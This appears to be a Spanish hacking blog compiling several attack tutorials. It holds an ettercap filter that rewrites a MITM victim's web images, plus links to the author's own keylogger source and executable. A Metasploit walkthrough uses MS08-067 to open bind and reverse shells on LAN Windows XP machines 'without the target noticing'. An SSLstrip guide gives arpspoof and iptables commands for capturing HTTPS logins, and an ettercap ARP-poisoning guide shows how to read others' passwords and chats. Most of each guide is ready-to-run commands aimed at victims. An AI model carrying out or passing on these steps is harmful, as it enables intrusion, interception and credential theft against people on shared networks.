Filtro cambiar imagenes ettercap

Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in the middle.

Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el script.

     http://www.irongeek.com/i.php?page=security/ettercapfilter

El script es el siguiente:

Código:

   

############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
   # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

    
Ahora modificamos la dirección de las imagenes por las que nosotros quramos, por ejemplo la de portalhacker.n et, quedaria asi:

Código:

if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
   replace("IMG SRC=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
   msg("Filter Ran.\n");
}

Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.

Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez alli ponemos y se compilara el filtro:

        etterfilter imagen.filter -o imagen.ef  

Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
        /usr/share/ettercap

Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaa filters->load a filter.
Una vez aqui seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro aplicado y las imagenes que vea la victima seran sustituidas por las que nosotros queramos.


fuente:      http://www.irongeek.com/i.php?page=security/ettercapfilter

by Aetsu

morsa-Keylogger v1.7

Última versión del morsa-keylogger. Se ha añadido la opción para ver los parametros del servidor ftp y se ha optimizado el menú.

 

Codigo ( .cpp)

https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger%20v1.7.cpp/download

Ejecutable ( .exe)

https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger%20v1.7.exe/download

Directorio de los archivos:

http://sourceforge.net/projects/morsa-keylogger/files/

by Alpha.Aetsu

Morsa-Keylogger v1.6

Esta versión corrige algunos bugs encontrados en la versión anterior.

Codigo ( .cpp)

https://sourceforge.net/projects/morsa-keylogger/files/Morsa-Keylogger%20v1.6.cpp/download

Ejecutable ( .exe)

https://sourceforge.net/projects/morsa-keylogger/files/Morsa-Keylogger%20v1.6.exe/download

Directorio de los archivos:

http://sourceforge.net/projects/morsa-keylogger/files/

Morsa-keylogger v1.5

 Nueva versión del keylogger desarrollado por mi con la mejora implementada que ofrece la posibilidad de configurar el keylogger desde el ejecutable.
 Las próximas mejora programadas seran correccion de bugs y la version 2.0 y última poseera ya interfaz gráfica, aunque dicha versión no tiene fecha de salida proxima.

Codigo ( .cpp)

https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger%20v1.5.cpp/download

Ejecutable ( .exe)

https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger%20v1.5.exe/download

Directorio de los archivos:

http://sourceforge.net/projects/morsa-keylogger/files/

Alpha Aetsu

TUTORIAL METASPLOIT puerto 445

 Hoy vamos ha intentar introducirnos en un ordenador de nuestra LAN que utilice Windows XP aprovechando el puerto 445, es decir, obtendremos una shell en un XP de nuestra red local aprovechando el puerto 445 utilizado para compartir archivos e impresoras.
 Para hacer esto utilizaremos el metasploit, que podriamos definir como un gran compendio de exploits. Para este tutorial el atacante utilizara Backtrack 4 pre-final, pero explicaré como instalarlo en ubuntu. Respecto a su utilizacion es identica en ambos.

Primero, ¿como instalamos metasploit en ubuntu?

Pues necesitaremos tener instaladas las siguientes librerias:

    sudo apt-get install ruby libruby rdoc
    sudo apt-get install libyaml-ruby
    sudo apt-get install libzlib-ruby
    sudo apt-get install libopenssl-ruby
    sudo apt-get install libdl-ruby
    sudo apt-get install libreadline-ruby
    sudo apt-get install libiconv-ruby
    sudo apt-get install rubygems *

El paquete rubygems tiene que ser descargado manualmente de

  http://rubyforge.org/frs/?group_id=126

A continuación para poder tener el metasploit actualizado tenemos que instalar subversion
   
    sudo apt-get install subversion

Ahora descargamos el metasploit de
   
  http://metasploit.com/framework/

también hay una version para windows, lo que no la he utilizado, pero supongo que será similar.

Para concluir la instalación abrimos la carpeta del metasploit y ponemos

      sudo svn update

con esto ya deberiamos tener el metasploit funcionando.


Segundo, ¿ como encontramos a nuestras víctimas?

 Muy fácil, utilizamos por ejemplo nmap para ver los ordenadores de nuestra LAN:

                 # nmap -sSV 192.168.1.0/24

Con esto se nos mostrarán todos los host de nuestra red, además de sus puertos abiertos, el servicio que utilizan dichos puertos y el SO de los ordenadores.


Tercero, ya tenemos el objetivo localizado, el metasploit descargado e instalado y  ahora, ¿que coño hacemos con esto?

Bueno abrimos la carpeta del metasploit y:
                                 
                 ./msfconsole

Tardaraá un poco pero nos mostrara una bonita pantalla de presentación y con ello el metasploit corriendo.

A continuacion pasare a explicar la utilizacion de dos exploits que aprovechan la vulnerabilidad en este puerto. Ambos son de muy similar utilización, pero el segundo permite tambien conexiones através de internet (no lo veremos en este articulo).




Primer exploit:

1 -  Ponemos:
                 
              use windows/smb/ms08_067_netapi

 

2 - Ahora podemos ver los payloads de que disponemos con:

            

                show payloads

3 – A continuación seleccionamos el payload con:

    

                  set payload windows/shell_bind_tcp

4 - Podemos ver las opciones del payload con:

      
                   show options

5 - Seleccionamos la ip objetivo:

                 set RHOST {ip_objetivo}

6 - Y por último lanzamos el exploit:

                   exploit

Con todo esto ya tendriamos una shell en el sistema víctima sin que nuestro objetivo se diese cuenta.

EN RESUMEN:

                # nmap -sSV 192.168.1.0/24

                  use windows/smb/ms08_067_netapi

                  set payload windows/shell_bind_tcp

                  set RHOST {ip_objetivo}

                  exploit




Segundo exploit:

1 -  Ponemos:
                 
              use windows/smb/ms08_067_netapi

       

2 - Ahora podemos ver los payloads de que disponemos con:
       
                show payloads

3 – A continuación seleccionamos el payload con:

                set payload windows/shell_reverse_tcp

4 - Podemos ver las opciones del payload con:
     
               show options

5 - Seleccionamos la ip objetivo:

                  set rhost {ip_objetivo}

6 - Ponemos nuestra ip:

                   set lhost {nuestra_ip}

7 - Y por último lanzamos el exploit:

                    exploit

Con todo esto ya tendriamos una shell en el sistema víctima sin que nuestro objetivo se diese cuenta.

EN RESUMEN:

                # nmap -sSV 192.168.1.0/24

                    use windows/smb/ms08_067_netapi

                    set payload windows/shell_reverse_tcp

                    set rhost {ip_objetivo}

                    set lhost {nuestra_ip}

                    exploit

Alpha Aetsu

Tutorial SSLstrip

SSLstrip nos permite sniffar usuarios y contraseñas encriptadas en HTTPS. Esto lo hace realizando un ataque MITM entre el servidor y nuestro objetivo conectandose al servidor mediante HTTP (sin encriptar) en lugar de HTTPS (encriptado) con lo que los datos son visibles. Algunos ejemplos de páginas que utilizan esta encriptacion son Gmail, Hotmail o Tuenti.

Bueno primero nos descargamos un script en python desde

             http://www.thoughtcrime.org/software/sslstrip/index.html

o la descarga directa

             http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

Una vez descargado lo extraemos y obtendremos como resultado una carpeta llamada sslstrip-0.6 (la version actual).

A continuación abrimos una shell y ponemos:

              echo "1" > /proc/sys/net/ipv4/ip_forward

ahora realizamos el ataque MITM

             # arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}

a modo de  ejemplo

             #  arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

abrimos otra shell y cambiamos la redireccion de puertos usando las iptables

            # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

 una vez echo lo anterior lanzamos el SSLstrip    

     # python sslstrip.py -w {nombre_del_archivo_de_captura}

a modo de  ejemplo

         # python sslstrip.py -w morsa

volvemos a abrir otra shell si queremos ver en tiempo real la informacion obtenida

         # tail -f {nombre_del_archivo_de_captura}

a modo de  ejemplo

         # tail -f morsa

Para terminar si posteriormente queremos ver los archivos del fichero de captura hacemos

       nano {nombre_del_archivo_de_captura}

o a modo de  ejemplo

         # nano morsa

Bueno esto es todo relativo al SSLstrip un saludo y nos vemos.

Alpha.Aetsu

       

Manual básico ettercap (entorno grafico)

 Hoy hablaremos de ettercap, un programa que nos permite sniffar el trafico de red y obtener asi las contraseñas escritas por otros usuarios de nuestra red, además también permite leer, por ejemplo, las conversaciones del messenger u otros programas de mensajeria instantánea.

1 - Primero tenemos que descargar el ettercap, la ultima version es la 0.7.3 y
esta disponible tanto para windows como para linux.

         Windows:

                     http://sourceforge.net/projects/ettercap/files/unofficial%20binaries/windows/

         Linux:
                   

                     http://ettercap.sourceforge.net/download.php

          o (en el caso de ubuntu)

                     # apt-get install ettercap-gtk

2 - Lo instalamos.

Si tienes la versión para compilar de linux:

         # ./configure
         # make
         # make install

3 - Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitira seleccionar la interfaz de red a utilizar).

3b - Si queremos arrancarlo desde una shell (en caso de linux):
     
       sudo ettercap -C

4 - Pestaña Sniff>Unified Sniffing

5 - Seleccionamos la interfaz que esta conectada a la red que queremos sniffar,
despues le damos a "Aceptar".

6 - Pestaña Host>Scan for hosts.
En la parte de abajo de la pantalla aparecera algo como " X hosts added to the hosts list..."
(X sera un numero correspondiente al numero de maquinas conectadas a la red).

7 - Pestaña Host>Host list.
Ahora apareceran las IPs de las maquinas conectadas, hay que tener en cuenta que el router también
aparece (No aparece nuestro PC).

8 - Si solo aparece la IP del router es que no hay nadie mas conectado (xD).

9 - Si aparecen mas IPs seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", después el router "Add to Target 2".


  Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en cuenta que vamos a utilizar una técnica llamada Man In The Middle (MITM) y lo que haremos sera que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos desconectamos sin detener el ataque MITM nuestra victima se quedara sin conexion hasta que reinicie el PC.

10 - Pestaña Mitm>ARP Poisoning. Ahora marcamos la pestaña "Sniff remote connections" y pulsamos "Aceptar".

11 - Pestaña Start>Start sniffing.

Con esto estaremos snifando el trafico de red.

12 - Pestaña View>Connections. Aqui podemos ver todas las conexiones y hacemos doble click sobre alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y contraseñas, etc.

Ahora es cuestion de paciencia.

MUY IMPORTANTE!!!!
Cuando terminemos tenemos que hacer:

13 - Pestaña Start>Stop sniffing.

14 - Pestaña Mitm>Stop Mitm Attack(s).
Sino hacemos esto el PC atacado se quedara sin conexion hasta que reinicie.

                                                                                                                                                      Alpha.Aetsu